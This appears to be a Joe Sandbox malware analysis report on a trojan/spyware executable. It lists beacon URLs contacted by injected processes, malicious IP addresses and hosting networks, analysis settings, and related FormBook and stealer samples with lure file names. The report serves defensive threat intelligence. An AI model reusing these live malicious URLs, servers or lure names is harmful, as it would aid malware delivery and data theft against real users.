                                                        http://www.f5jh81t3k1w8.sbs/blfv/?Bb6h7=gBiPvnrHa&V8=OYzX9ZD8JFvHop8tcVV8HuyU67NFgrHF6vfAGJLgGhZlSUdZ/OYKAWfRY9pPenrbZbnckt/3jffsXR68PKDW9Ecs4jeXW699fOhXXOdveN0uJ+M8ggMhXVa/XAWEfUcQVw==true
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://www.axis138ae.shop/j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCkgI7u5WRyoS939Z0WQWWR6oSqfY2a6i6yoynlWLywOB6FnF6t61mCd33fp8fgqeNJIahdroNOItErrJD4XA==true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtablogman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.deacapalla.online/__media__/design/underconstructionnotice.php?d=deacapalla.onlinelogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://dts.gnpge.comWnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            high
                                                            https://duckduckgo.com/ac/?q=logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotlogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                high
                                                                https://cdn.consentmanager.netlogman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.axis138ae.shop/j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCklogman.exe, 00000005.00000002.4505185726.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.00000000047DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otflogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.google.comlogman.exe, 00000005.00000002.4505185726.00000000047B4000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004194000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        http://i4.cdn-image.com/__media__/pics/29590/bg1.png)logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.al-madinatraders.shopWnOFOMnqmLQAP.exe, 00000007.00000002.4506381463.00000000055C6000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://digi-searches.com/Lucinda.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnXlogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otflogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            high
                                                                            http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpglogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchlogman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://digi-searches.com/Pieces.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX6logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://digi-searches.com/Cousins.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnXlogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://i4.cdn-image.com/__media__/pics/28903/search.png)logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://delivery.consentmanager.netlogman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixlogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotlogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icologman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.Deacapalla.onlinelogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttflogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://digi-searches.com/September.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFlogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://www.ecosia.org/newtab/logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://ac.ecosia.org/autocomplete?q=logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttflogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpglogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.deacapalla.online/__media__/js/trademark.php?d=deacapalla.online&type=nslogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://digi-searches.com/Ambrosia.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnlogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixlogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularlogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.wofflogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://i4.cdn-image.com/__media__/js/min.js?v2.3logman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.wofflogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.vh5g.sbs/logman.exe, 00000005.00000002.4505185726.0000000004490000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000003E70000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=logman.exe, 00000005.00000003.2600123925.00000000078CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldlogman.exe, 00000005.00000002.4506829903.0000000005E80000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.0000000004946000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.0000000004326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://maximumgroup.co.za/tw42/?V8=lppBzHasG2q3W2gwBEigKsWnOFOMnqmLQAP.exe, 00000007.00000002.4504730095.00000000044B8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          104.21.48.1
                                                                                                                          www.axis138ae.shopUnited States
                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                          209.74.79.42
                                                                                                                          www.valuault.storeUnited States
                                                                                                                          31744MULTIBAND-NEWHOPEUStrue
                                                                                                                          188.114.97.3
                                                                                                                          www.vh5g.sbsEuropean Union
                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                          93.127.192.201
                                                                                                                          al-madinatraders.shopGermany
                                                                                                                          62255ASMUNDA-ASSCtrue
                                                                                                                          208.91.197.27
                                                                                                                          www.deacapalla.onlineVirgin Islands (BRITISH)
                                                                                                                          40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                          47.254.140.255
                                                                                                                          www.odvfr.infoUnited States
                                                                                                                          45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                          199.59.243.228
                                                                                                                          www.marketyemen.holdingsUnited States
                                                                                                                          395082BODIS-NJUStrue
                                                                                                                          136.243.64.147
                                                                                                                          100millionjobs.africaGermany
                                                                                                                          24940HETZNER-ASDEtrue
                                                                                                                          134.122.133.80
                                                                                                                          zcdn.8383dns.comUnited States
                                                                                                                          64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                                                                          85.159.66.93
                                                                                                                          natroredirect.natrocdn.comTurkey
                                                                                                                          34619CIZGITRfalse
                                                                                                                          154.213.39.66
                                                                                                                          www.f5jh81t3k1w8.sbsSeychelles
                                                                                                                          132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                                                                          46.38.243.234
                                                                                                                          www.lmueller.devGermany
                                                                                                                          197540NETCUP-ASnetcupGmbHDEtrue
                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                          Analysis ID:1587671
                                                                                                                          Start date and time:2025-01-10 16:40:05 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 10m 43s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:7
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:2
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:NWPZbNcRxL.exe
                                                                                                                          renamed because original name is a hash value
                                                                                                                          Original Sample Name:05cddefc8992523851a932ec1420caf380bd0907ac51d8e8b2a8b41027781c96.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/5@16/12
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 75%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 91%
                                                                                                                          • Number of executed functions: 58
                                                                                                                          • Number of non-executed functions: 270
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          TimeTypeDescription
                                                                                                                          10:42:09API Interceptor10179964x Sleep call for process: logman.exe modified
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          104.21.48.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                          • twirpx.org/administrator/index.php
                                                                                                                          SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.antipromil.site/7ykh/
                                                                                                                          209.74.79.42zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.glowups.life/o8f4/
                                                                                                                          SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.primespot.live/icu6/
                                                                                                                          Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.glowups.life/dheh/
                                                                                                                          72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.primespot.live/b8eq/
                                                                                                                          188.114.97.3KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.beylikduzu616161.xyz/2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy
                                                                                                                          GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                                                                                          • /api/get/dll
                                                                                                                          DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.uzshou.world/ricr/
                                                                                                                          Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.cifasnc.info/8rr3/
                                                                                                                          Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                          • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                                                                                                          Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.cifasnc.info/8rr3/
                                                                                                                          dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • /api/get/free
                                                                                                                          dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • /api/get/free
                                                                                                                          RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.rgenerousrs.store/o362/
                                                                                                                          A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.beylikduzu616161.xyz/2nga/
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          zcdn.8383dns.comhttps://199.188.109.181Get hashmaliciousUnknownBrowse
                                                                                                                          • 134.122.133.80
                                                                                                                          0Z2lZiPk5K.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                                                          • 134.122.133.80
                                                                                                                          DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 134.122.135.48
                                                                                                                          PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 134.122.135.48
                                                                                                                          Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 134.122.135.48
                                                                                                                          Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 134.122.133.80
                                                                                                                          inv#12180.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 154.21.203.24
                                                                                                                          www.marketyemen.holdingsDHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 199.59.243.228
                                                                                                                          natroredirect.natrocdn.comPO-0005082025 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          DHL-DOC83972025-1.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          BP-50C26_20241220_082241.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          PO-000172483 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          rDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 85.159.66.93
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          CLOUDFLARENETUSzE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          tx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.32.1
                                                                                                                          https://zfrmz.com/3GiGYUP4BArW2NBgkPU3Get hashmaliciousUnknownBrowse
                                                                                                                          • 104.18.94.41
                                                                                                                          Play_VM-NowTingrammAudiowav011.htmlGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.17.25.14
                                                                                                                          https://theleadking2435063.emlnk.com/lt.php?x=3DZy~GDHJaLL5a37-gxLhhGf13JRv_MkkPo2jHPMKXOh5XR.-Uy.xuO-2I2imNfGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.17.203.31
                                                                                                                          New Order-090125.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 104.21.96.1
                                                                                                                          Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.56.70
                                                                                                                          https://na4.docusign.net/Signing/EmailStart.aspx?a=ffa78034-d960-4bb3-b2a2-bb62a1fc4a65&etti=24&acct=86dab687-685e-40aa-af52-e5c3fc07b508&er=04714c6d-cc25-4a21-be91-01e1c43a5f3fGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          DpTbBYeE7J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                          • 104.26.12.205
                                                                                                                          CLOUDFLARENETUSzE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          tx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.32.1
                                                                                                                          https://zfrmz.com/3GiGYUP4BArW2NBgkPU3Get hashmaliciousUnknownBrowse
                                                                                                                          • 104.18.94.41
                                                                                                                          Play_VM-NowTingrammAudiowav011.htmlGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.17.25.14
                                                                                                                          https://theleadking2435063.emlnk.com/lt.php?x=3DZy~GDHJaLL5a37-gxLhhGf13JRv_MkkPo2jHPMKXOh5XR.-Uy.xuO-2I2imNfGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.17.203.31
                                                                                                                          New Order-090125.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 104.21.96.1
                                                                                                                          Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.56.70
                                                                                                                          https://na4.docusign.net/Signing/EmailStart.aspx?a=ffa78034-d960-4bb3-b2a2-bb62a1fc4a65&etti=24&acct=86dab687-685e-40aa-af52-e5c3fc07b508&er=04714c6d-cc25-4a21-be91-01e1c43a5f3fGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          DpTbBYeE7J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                          • 104.26.12.205
                                                                                                                          ASMUNDA-ASSCbiubiu.exeGet hashmaliciousUnknownBrowse
